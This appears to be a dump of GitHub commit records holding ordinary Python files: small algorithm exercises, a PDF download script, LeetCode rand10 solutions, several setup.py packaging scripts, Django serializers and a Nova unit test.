            peak = digit
        else:
            pending.append(digit)
    if pending:
        result.append(pending)
    return result
# Ad-hoc test cases exercised at import time (Python 2 print statements).
string = '543987'
result = [5,[4,3],9,[8,7]]
print numbers_in_lists(string)
#testcases
string = '543987'
result = [5,[4,3],9,[8,7]]
print repr(string), numbers_in_lists(string) == result
string= '987654321'
result = [9,[8,7,6,5,4,3,2,1]]
print numbers_in_lists(string)
print repr(string), numbers_in_lists(string) == result
string = '455532123266'
result = [4, 5, [5, 5, 3, 2, 1, 2, 3, 2], 6, [6]]
print numbers_in_lists(string)
print repr(string), numbers_in_lists(string) == result
string = '123456789'
result = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print numbers_in_lists(string)
print repr(string), numbers_in_lists(string) == result
|
apache-2.0
|
Python
|
|
ba09b09e7315cafa96e162a8186abe14c51c8128
|
Add a script to download files from url
|
qingkaikong/useful_script,qingkaikong/useful_script,qingkaikong/useful_script,qingkaikong/useful_script,qingkaikong/useful_script
|
python/download_file_from_url.py
|
python/download_file_from_url.py
|
import urllib2
'''
Script to download pdf from a url, you need specify the website URL, and change the
filename in the loop, it mostly useful to download a sequence of files with the
filename only differ by a sequence number, e.g. CH1.PDF, CH2.PDF, CH3.PDF ...
'''
def download_file(download_url, output_name):
    '''
    Download the resource at *download_url* and save it to *output_name*.

    download_url is the url pointing to the file
    output_name is the filename to write locally
    '''
    response = urllib2.urlopen(download_url)
    # Write in binary mode: the payload is a PDF, and text mode ('w')
    # corrupts binary data on platforms that translate line endings.
    # The with-statement also guarantees the file is closed on error.
    with open(output_name, 'wb') as out:
        out.write(response.read())
    print(output_name + " Completed")
if __name__ == "__main__":
    # Download chapters CH0.PDF .. CH34.PDF from dspguide.com.
    path = 'http://www.dspguide.com/'
    for i in range(35):
        # example of the file name is: CH1.PDF
        filename = 'CH' + str(i) + '.PDF'
        fileloc = path + filename
        download_file(fileloc, filename)
|
bsd-3-clause
|
Python
|
|
69c01499e92808f2a513e695d09e58f55dcd569b
|
Update implement-rand10-using-rand7.py
|
kamyu104/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode
|
Python/implement-rand10-using-rand7.py
|
Python/implement-rand10-using-rand7.py
|
# Time: O(1.189), counted by statistics, limit would be O(log10/log7) = O(1.183)
# Space: O(1)
# Given a function rand7 which generates a uniform random integer in the range 1 to 7,
# write a function rand10 which generates a uniform random integer in the range 1 to 10.
#
# Do NOT use system's Math.random().
#
# Example 1:
#
# Input: 1
# Output: [7]
# Example 2:
#
# Input: 2
# Output: [8,4]
# Example 3:
#
# Input: 3
# Output: [8,1,10]
#
# Note:
#
# rand7 is predefined.
# Each testcase has one argument: n, the number of times that rand10 is called.
#
# Follow up:
# - What is the expected value for the number of calls to rand7() function?
# - Could you minimize the number of calls to rand7()?
#
# The rand7() API is already defined for you.
import random
def rand7():
    # Stand-in for the predefined rand7() API: uniform integer in [1, 7].
    return random.randint(1, 7)
# Reference: https://leetcode.com/problems/implement-rand10-using-rand7/discuss/151567/C++JavaPython-Average-1.199-Call-rand7-Per-rand10
class Solution(object):
    """Batch approach: one draw of 32 rand7() calls yields a uniform
    base-7 number in [0, 7^32); every base-10 digit taken from the
    portion below the largest multiple of 10 is itself uniform, and
    those digits are cached for subsequent rand10() calls.

    Python 2 only: relies on integer `/=` and xrange.
    """

    def __init__(self):
        # Cache of pre-generated uniform values in [1, 10].
        self.__cache = []

    def rand10(self):
        """
        :rtype: int
        """
        def generate(cache):
            n = 32
            # curr is uniform over [0, 7^n) -- a base-7 number built
            # from n independent rand7() draws.
            curr = sum((rand7()-1) * (7**i) for i in xrange(n))
            rang = 7**n
            # Peel off uniform base-10 digits while curr stays inside
            # the region where each digit is unbiased.
            while curr < rang//10*10:
                cache.append(curr%10+1)
                curr /= 10
                rang /= 10
        while not self.__cache:
            generate(self.__cache)
        return self.__cache.pop()
# Time: O(2 * (1 + (9/49) + (9/49)^2 + ...)) = O(2/(1-(9/49)) = O(2.45)
# Space: O(1)
class Solution2(object):
    """Rejection sampling: two rand7() draws form a uniform value in
    [0, 48]; values in [0, 39] map uniformly onto 1..10 and anything
    larger is discarded and redrawn.
    """

    def rand10(self):
        """
        :rtype: int
        """
        while True:
            high = rand7() - 1
            low = rand7() - 1
            sample = high * 7 + low
            if sample >= 40:
                continue
            return sample % 10 + 1
|
# Time: O(1.199), counted by statistics, limit would be O(log10/log7) = O(1.183)
# Space: O(1)
# Given a function rand7 which generates a uniform random integer in the range 1 to 7,
# write a function rand10 which generates a uniform random integer in the range 1 to 10.
#
# Do NOT use system's Math.random().
#
# Example 1:
#
# Input: 1
# Output: [7]
# Example 2:
#
# Input: 2
# Output: [8,4]
# Example 3:
#
# Input: 3
# Output: [8,1,10]
#
# Note:
#
# rand7 is predefined.
# Each testcase has one argument: n, the number of times that rand10 is called.
#
# Follow up:
# - What is the expected value for the number of calls to rand7() function?
# - Could you minimize the number of calls to rand7()?
#
# The rand7() API is already defined for you.
import random
def rand7():
    # Stand-in for the predefined rand7() API: uniform integer in [1, 7].
    return random.randint(1, 7)
# Reference: https://leetcode.com/problems/implement-rand10-using-rand7/discuss/151567/C++JavaPython-Average-1.199-Call-rand7-Per-rand10
class Solution(object):
    """Earlier revision of the batching solution: identical to the newer
    one except the batch size n is 19 rand7() draws instead of 32
    (the header notes n=32 lowers the expected call count to ~1.189).

    Python 2 only: relies on integer `/=` and xrange.
    """

    def __init__(self):
        # Cache of pre-generated uniform values in [1, 10].
        self.__cache = []

    def rand10(self):
        """
        :rtype: int
        """
        def generate(cache):
            n = 19 # if n = 32, it would be O(1.189)
            # curr is uniform over [0, 7^n) -- a base-7 number built
            # from n independent rand7() draws.
            curr = sum((rand7()-1) * (7**i) for i in xrange(n))
            rang = 7**n
            # Peel off uniform base-10 digits while curr stays inside
            # the region where each digit is unbiased.
            while curr < rang//10*10:
                cache.append(curr%10+1)
                curr /= 10
                rang /= 10
        while not self.__cache:
            generate(self.__cache)
        return self.__cache.pop()
# Time: O(2 * (1 + (9/49) + (9/49)^2 + ...)) = O(2/(1-(9/49)) = O(2.45)
# Space: O(1)
class Solution2(object):
    """Rejection sampling: (rand7()-1)*7 + (rand7()-1) is uniform over
    [0, 48]; values below 40 map uniformly onto 1..10, larger values
    are redrawn.
    """

    def rand10(self):
        """
        :rtype: int
        """
        while True:
            x = (rand7()-1)*7 + (rand7()-1)
            if x < 40:
                return x%10 + 1
|
mit
|
Python
|
a83282f43fdf87bad8abc63c5a0b41f8c9053a5f
|
Add setup script
|
vrtsystems/hszinc,vrtsystems/hszinc
|
setup.py
|
setup.py
|
#!/usr/bin/python
from setuptools import setup
import sys
sys.path.insert(0, 'src')
from hszinc import __version__
setup (name = 'hszinc',
package_dir = {'': 'src'},
version = __version__,
packages = [
'hszinc',
],
)
|
bsd-2-clause
|
Python
|
|
60f6a83964b70700883121afb7aed22a7ffe7acc
|
Add setup.py
|
alanhdu/bfd,AndrewAday/bfd,concord/ml,concord/bfd
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name='bfd',
version='0.1',
description='ML w/ Concord',
url='https://github.com/adi-labs/bfd',
author='Andrew Aday, Alan Du, Carlos Martin, Dennis Wei',
author_email='alanhdu@gmail.com',
license='Apache',
packages=['bcd', 'data'],
install_requires=[
"yahoo-finance",
"concord-py",
"scipy",
"pandas",
"numpy",
],
classifiers=['Development Status :: 3 - Alpha'],
zip_safe=False)
|
apache-2.0
|
Python
|
|
525e0656f57b67744dfa5529687c5d40d3f43327
|
Add address/serializers.py
|
lkmhaqer/gtools-python,lkmhaqer/gtools-python
|
address/serializers.py
|
address/serializers.py
|
# file: address/serializers.py
from rest_framework import serializers
from address.models import ipv6_address, ipv4_address
class Ipv6AddressSerializer(serializers.ModelSerializer):
    """Serializes every field of the ipv6_address model."""
    class Meta:
        model = ipv6_address
        fields = ('__all__')


class Ipv4AddressSerializer(serializers.ModelSerializer):
    """Serializes every field of the ipv4_address model.

    The original file defined Ipv6AddressSerializer twice (a copy/paste
    slip) -- the duplicate shadowed the first definition and left the
    imported ipv4_address model unused. This is the intended v4 class.
    """
    class Meta:
        model = ipv4_address
        fields = ('__all__')
|
mit
|
Python
|
|
66bb6c75017eddd952d43e7dc72004a05c9659b1
|
add test for kvmha_manager
|
leilihh/novaha,leilihh/novaha
|
nova/tests/kvmha/test_kvmha_manager.py
|
nova/tests/kvmha/test_kvmha_manager.py
|
#
# KVM HA in OpenStack (Demo Version)
#
# Copyright HP, Corp. 2014
#
# Authors:
# Lei Li <li.lei2@hp.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.i
#
"""
Unit Tests for nova.kvmha.manager
"""
import mox
import mock
from oslo.config import cfg
import nova
from nova import context
from nova import exception
#from nova.kvmha import manager as kvmha_manager
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova import test
from nova.tests import fake_instance
from nova import utils
CONF = cfg.CONF
CONF.import_opt('kvmha_manager', 'nova.service')
LOG = logging.getLogger(__name__)
class KvmhaTestCase(test.TestCase):
    """Unit tests for nova.kvmha.manager."""

    def setUp(self):
        super(KvmhaTestCase, self).setUp()
        self.context = context.RequestContext('fake', 'fake')
        # Instantiate whichever manager class the kvmha_manager option names.
        self.kvmha = importutils.import_object(CONF.kvmha_manager)

    @mock.patch('nova.kvmha.manager.KvmhaManager._get_target_instances')
    def test_get_target_instances(self, get_target_instances):
        # _get_target_instances itself is mocked, so this only verifies
        # the call path returns the mocked value unchanged.
        fake_host = 'fake-host'
        fake_instances = ['fake1', 'fake2']
        get_target_instances.return_value = fake_instances
        res = self.kvmha._get_target_instances(fake_host)
        self.assertEqual(fake_instances, res)
|
apache-2.0
|
Python
|
|
c05210b4557c56e7b7585ec22b27dd0f34f69f09
|
add a setup.py to make this a nice official package
|
sdgdsffdsfff/google-mysql-tools,dbarobin/google-mysql-tools,sdgdsffdsfff/google-mysql-tools,dbarobin/google-mysql-tools,vincentor/google-mysql-tools,vincentor/google-mysql-tools
|
setup.py
|
setup.py
|
#!/usr/bin/python2.4
#
# Copyright 2006 Google Inc. All Rights Reserved.
from distutils.core import setup
setup(name="google-mysql-tools",
description="Google MySQL Tools",
url="http://code.google.com/p/google-mysql-tools",
version="0.1",
packages=["gmt"],
scripts=["mypgrep.py", "compact_innodb.py"])
|
apache-2.0
|
Python
|
|
4a92b178d6fe2138a70e5f4f9833d7697437561b
|
Add setup.py
|
imom0/django-plim
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup
setup(
name='django_plim',
version='0.0.1',
author='iMom0',
author_email='mobeiheart@gmail.com',
description=('Introduce plim to django'),
license='BSD',
keywords='plim mako django slim',
url='https://github.com/imom0/django-plim',
install_requires=[
'plim>=0.9.1',
],
test_suite='nose.collector',
tests_require='nose==1.3.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Topic :: Utilities',
'License :: OSI Approved :: BSD License',
],
)
|
mit
|
Python
|
|
ba0e4042e25ec007df5766da16902cbeb55388f4
|
add setup.py
|
kontron/python-hpi
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup
def main():
setup(name = 'pyhpi',
version = '1.00',
description = 'Pure python HPI library',
author_email = 'michael.walle@kontron.com',
packages = [ 'pyhpi',
],
)
if __name__ == '__main__':
main()
|
lgpl-2.1
|
Python
|
|
63faa61c35aafd658ced61ee95ed857a33eb398b
|
Add setup.py file
|
playfire/django-bcrypt
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='django-bcrypt',
description="bcrypt password hash support for Django.",
version='0.1',
url='http://code.playfire.com/django-bcrypt',
author='Playfire.com',
author_email='tech@playfire.com',
license='BSD',
packages=find_packages(),
)
|
bsd-3-clause
|
Python
|
|
b97cdbb63923ef3e28bbd329df1afb140f3a349f
|
add setup.py
|
wkcn/mobula
|
setup.py
|
setup.py
|
from setuptools import setup, find_packages
setup(
name = 'mobula',
version = '1.0',
description = 'A Lightweight & Flexible Deep Learning (Neural Network) Framework in Python',
author = 'wkcn',
author_email = 'wkcn@live.cn',
url = 'https://github.com/wkcn/mobula',
packages = find_packages(),
package_data = {
'' : ['*.md'],
'docs' : ['docs/*.md'],
'examples' : ['examples/*.py']
},
keywords = 'Deep Learning Framework in Python',
license = 'MIT',
install_requires = [
'numpy',
'numpy_groupies'
]
)
|
mit
|
Python
|
|
0cd5bba6bddbc7b057ff18268e31d7eac50b2d2c
|
update setup.py
|
ashgan-dev/mailthon,krysros/mailthon,eugene-eeo/mailthon
|
setup.py
|
setup.py
|
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyPackageTest(TestCommand):
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ['tests', '--strict', '-s']
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
setup(
name='mailthon',
version='0.0.0',
description='Elegant email library',
long_description=open('README.rst').read(),
author='Eeo Jun',
author_email='packwolf58@gmail.com',
url='https://github.com/eugene-eeo/mailthon/',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
package_data={'mailthon': ['LICENSE', 'README.rst']},
packages=['mailthon'],
cmdclass={'test': PyPackageTest},
)
|
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyPackageTest(TestCommand):
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ['--strict']
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
setup(
name='mailthon',
version='0.0.0',
description='Elegant email library',
long_description=open('README.rst').read(),
author='Eeo Jun',
author_email='packwolf58@gmail.com',
url='https://github.com/eugene-eeo/mailthon/',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
package_data={'mailthon': ['LICENSE', 'README.rst']},
packages=['mailthon'],
cmdclass={'test': PyPackageTest},
)
|
mit
|
Python
|
29c2f663556d762167499d23921007f025738188
|
update setup.py
|
TetraEtc/limbo,TetraEtc/limbo,llimllib/limbo,llimllib/limbo
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Thanks to Kenneth Reitz, I stole the template for this
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
PYTHON3 = sys.version_info[0] > 2
required = ['requests>=2.12', 'websocket-client==0.40.0',
'beautifulsoup4==4.5.1', 'html5lib==0.999999999', 'pyfiglet==0.7.5',
'certifi==2016.9.26']
if not PYTHON3:
required += ['importlib>=1.0.4']
packages = ['limbo', 'limbo.plugins']
try:
longdesc = open("README.rst").read()
except:
longdesc = ''
setup(
name='limbo',
version='5.0.3',
description='Simple and Clean Slack Chatbot',
long_description=longdesc,
author='Bill Mill',
author_email='bill@billmill.org',
url='https://github.com/llimllib/limbo',
packages=packages,
scripts = ['bin/limbo'],
package_data={'': ['LICENSE',], '': ['limbo/plugins/*.py']},
include_package_data=True,
install_requires=required,
license='MIT',
classifiers=(
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: PyPy',
),
keywords="slack chatbot chat limbo",
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Thanks to Kenneth Reitz, I stole the template for this
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
PYTHON3 = sys.version_info[0] > 2
required = ['requests>=2.9', 'websocket-client==0.35.0',
'beautifulsoup4==4.4.1', 'html5lib==0.9999999', 'pyfiglet==0.7.4',
'certifi==2015.04.28']
if not PYTHON3:
required += ['importlib>=1.0.3']
packages = ['limbo', 'limbo.plugins']
try:
longdesc = open("README.rst").read()
except:
longdesc = ''
setup(
name='limbo',
version='5.0.3',
description='Simple and Clean Slack Chatbot',
long_description=longdesc,
author='Bill Mill',
author_email='bill@billmill.org',
url='https://github.com/llimllib/limbo',
packages=packages,
scripts = ['bin/limbo'],
package_data={'': ['LICENSE',], '': ['limbo/plugins/*.py']},
include_package_data=True,
install_requires=required,
license='MIT',
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
),
)
|
mit
|
Python
|
a6e4f8bf2716eda79a27ec025399b18c76b3356a
|
Fix url
|
seatgeek/graphite-pager,seatgeek/graphite-pager,ProsperWorks/graphite-pager,ProsperWorks/graphite-pager
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from graphitepager import __version__
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def open_file(fname):
return open(os.path.join(os.path.dirname(__file__), fname))
def run_setup():
setup(
name='graphitepager',
version=__version__,
author='Philip Cristiano',
author_email='philipcristiano@gmail.com',
packages=['graphitepager', 'graphitepager.notifiers'],
url='http://github.com/seatgeek/graphite-pager',
license='BSD',
classifiers=[
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2.6',
'Topic :: System :: Monitoring',
],
description='',
keywords='',
test_suite='tests',
long_description=open_file('README.rst').read(),
install_requires=open_file('requirements.txt').readlines(),
zip_safe=True,
entry_points="""
[console_scripts]
graphite-pager=graphitepager.worker:main
""",
)
if __name__ == '__main__':
run_setup()
|
#!/usr/bin/env python
from graphitepager import __version__
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def open_file(fname):
return open(os.path.join(os.path.dirname(__file__), fname))
def run_setup():
setup(
name='graphitepager',
version=__version__,
author='Philip Cristiano',
author_email='philipcristiano@gmail.com',
packages=['graphitepager', 'graphitepager.notifiers'],
url='http://github.com/philipcristiano/graphite-pager',
license='BSD',
classifiers=[
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2.6',
'Topic :: System :: Monitoring',
],
description='',
keywords='',
test_suite='tests',
long_description=open_file('README.rst').read(),
install_requires=open_file('requirements.txt').readlines(),
zip_safe=True,
entry_points="""
[console_scripts]
graphite-pager=graphitepager.worker:main
""",
)
if __name__ == '__main__':
run_setup()
|
bsd-2-clause
|
Python
|
b8c739f8befca266544d41d9ace34ae680fe5170
|
add setup.py
|
macrael/webnull
|
setup.py
|
setup.py
|
#!/usr/bin/env python
import os
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
BIN_DIR = os.path.expanduser("~/bin")
def symlink_to_bin():
    """Install webnull.py as ~/bin/webnull via a symlink, replacing any
    existing file or symlink at the destination."""
    ln_src = os.path.join(THIS_DIR, "webnull.py")
    ln_dest = os.path.join(BIN_DIR, "webnull")
    # Use lexists(), not isfile(): isfile() is False for a dangling
    # symlink, in which case os.symlink below would fail with
    # FileExistsError even though the destination needs replacing.
    if os.path.lexists(ln_dest):
        os.remove(ln_dest)
    os.symlink(ln_src, ln_dest)
if __name__ == "__main__":
symlink_to_bin()
|
bsd-3-clause
|
Python
|
|
a03ddd7dc0aa1166e88f71910ece2cd909d7b6c7
|
Add setup.py to executably document package requirements
|
mozilla/remoteobjects,alex/remoteobjects
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup
setup(
name='remoteobjects',
version='1.0',
description='an Object RESTational Model',
packages=['remoteobjects'],
package_dir={'remoteobjects': '.'},
install_requires=['simplejson>=2.0.0', 'httplib2>=0.4.0'],
provides=['remoteobjects'],
author='Six Apart',
author_email='python@sixapart.com',
url='http://code.sixapart.com/svn/remoteobjects/',
)
|
bsd-3-clause
|
Python
|
|
7046a54abc31ecc919c628bd197600ac09437989
|
Make dependency versions consistent.
|
cloudendpoints/endpoints-python,inklesspen/endpoints-python,cloudendpoints/endpoints-python,inklesspen/endpoints-python
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from setuptools import setup, find_packages
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('endpoints/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
version = match.group(1)
else:
raise RuntimeError("No version number found!")
install_requires = [
'google-endpoints-api-management>=1.1.1'
]
setup(
name='google-endpoints',
version=version,
description='Google Cloud Endpoints',
long_description=open('README.rst').read(),
author='Google Endpoints Authors',
author_email='googleapis-packages@google.com',
url='https://github.com/cloudendpoints/endpoints-python',
packages=find_packages(),
package_dir={'google-endpoints': 'endpoints'},
license='Apache',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: Implementation :: CPython',
],
scripts=['endpoints/endpointscfg.py'],
tests_require=['mox', 'protobuf', 'protorpc', 'pytest', 'webtest'],
install_requires=install_requires,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from setuptools import setup, find_packages
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('endpoints/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
version = match.group(1)
else:
raise RuntimeError("No version number found!")
install_requires = [
'google-endpoints-api-management>=1.0.0b1'
]
setup(
name='google-endpoints',
version=version,
description='Google Cloud Endpoints',
long_description=open('README.rst').read(),
author='Google Endpoints Authors',
author_email='googleapis-packages@google.com',
url='https://github.com/cloudendpoints/endpoints-python',
packages=find_packages(),
package_dir={'google-endpoints': 'endpoints'},
license='Apache',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: Implementation :: CPython',
],
scripts=['endpoints/endpointscfg.py'],
tests_require=['mox', 'protobuf', 'protorpc', 'pytest', 'webtest'],
install_requires=install_requires,
)
|
apache-2.0
|
Python
|
6d0f54db9654ffa02accb5c557e4d4a5952d0ba0
|
Add a setup.py
|
SS-RD/pkgcmp
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Import python libs
import os
import sys
if 'USE_SETUPTOOLS' in os.environ or 'setuptools' in sys.modules:
from setuptools import setup
else:
from distutils.core import setup
NAME = 'pkgcmp'
DESC = ('Automate the creation of a normalized cross distribution package naming database')
# Version info -- read without importing
_locals = {}
with open('pkgcmp/version.py') as fp:
exec(fp.read(), None, _locals)
VERSION = _locals['__version__']
setup(name=NAME,
version=VERSION,
description=DESC,
author='Thomas S Hatch',
author_email='thatch@saltstack.com',
url='https://saltstack.com',
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
],
scripts=['scripts/pkgcmp'],
packages=[
'pkgcmp',
'pkgcmp.scanners',
'pkgcmp.dbs',
])
|
apache-2.0
|
Python
|
|
9aabb59303d59287f1f29119a03c979ca0aeaefc
|
Bump version number to 0.10.1
|
zardus/idalink,rhelmot/idalink,rhelmot/idalink
|
setup.py
|
setup.py
|
from setuptools import setup, find_packages
setup(
name='idalink',
description='An interface to the insides of IDA!',
long_description=open('README.md').read(),
version='0.10.1',
url='https://github.com/zardus/idalink',
license='GNU General Public License v3',
packages=find_packages(),
package_data={
'idalink': ['support/*'],
},
install_requires=[
'rpyc',
],
)
|
from setuptools import setup, find_packages
setup(
name='idalink',
description='An interface to the insides of IDA!',
long_description=open('README.md').read(),
version='0.10',
url='https://github.com/zardus/idalink',
license='GNU General Public License v3',
packages=find_packages(),
package_data={
'idalink': ['support/*'],
},
install_requires=[
'rpyc',
],
)
|
bsd-2-clause
|
Python
|
2894db47391d055978a0bbde485fd06ce59a4fa1
|
Add setup.py for the project's package management
|
anirbanroydas/ci-testing-python,anirbanroydas/ci-testing-python,anirbanroydas/ci-testing-python
|
setup.py
|
setup.py
|
# !/usr/bin/env python
#
# setup.py script
#
# copyright 2016 anirban roy das <anirban.nick@gmail.com>
#
#
# Always prefer setuptools over distutils
from setuptools import setup
# To use a consistent encoding
import codecs
import os
# ############## general config ##############
NAME = "ci_testing_python"
VERSION = '0.1'
PACKAGES = ["ci_testing_python", "ci_testing_python.app"]
PROJECT_URL = 'https://github.com/anirbanroydas/ci-testing-python'
AUTHOR = 'Anirban Roy Das'
EMAIL = 'anirban.nick@gmail.com'
KEYWORDS = ['ci', 'jenkins', 'docker', 'python', 'flask',
'testing', 'travis-ci', 'tox', 'pytest']
CLASSIFIERS = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Natural Language
'Natural Language :: English',
# Specify the operating systems it can work on
'Operating System :: OS Independent',
# Specify the Python versions you support here. In particular, ensure that
# you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
]
INSTALL_REQUIRES = [
"Flask == 0.12",
"uwsgi == 2.0.14",
"requests == 2.13.0",
"redis == 2.10.5"
]
TEST_REQUIRES = [
"pytest == 3.0.6",
"pytest-flask == 0.10.0"
]
DEV_REQUIRES = [] + TEST_REQUIRES
EXTRAS_REQUIRE = {
'dev': DEV_REQUIRES,
'test': TEST_REQUIRES
}
PACKAGE_DATA = {
# data files need to be listed both here (which determines what gets
# installed) and in MANIFEST.in (which determines what gets included
# in the sdist tarball
"ci_testing_python": [],
}
# DATA_FILES =[]
HERE = os.path.abspath(os.path.dirname(__file__))
# ############ End of basic config ###########
# Get the long description from the README file
with codecs.open(os.path.join(HERE, 'README.rst'), 'rb', 'utf-8') as f:
LONG_DESCRIPTION = f.read()
# ### The main setup function ######
setup(
name=NAME,
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=VERSION,
description='A sample app in python for testing using flask, pytest, pytest-flask, uber\'s test doubles package with docker and ci environment - jenkins with docker',
long_description=LONG_DESCRIPTION,
# The project's main homepage.
url=PROJECT_URL,
# Author details
author=AUTHOR,
author_email=EMAIL,
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=CLASSIFIERS,
# What does your project relate to?
keywords=KEYWORDS,
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=PACKAGES,
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
# $ pip install .
install_requires=INSTALL_REQUIRES,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
# NOTE: If you're using zsh you need to escape square, i.e $ pip install -e .\[dev,test\]
extras_require=EXTRAS_REQUIRE,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .
test_suite='tests',
tests_require=TEST_REQUIRES,
# If set to True, this tells setuptools to automatically include
# any data files it finds inside your package directories that
# are specified by your MANIFEST.in file.
# include_package_data = True
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data=PACKAGE_DATA,
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
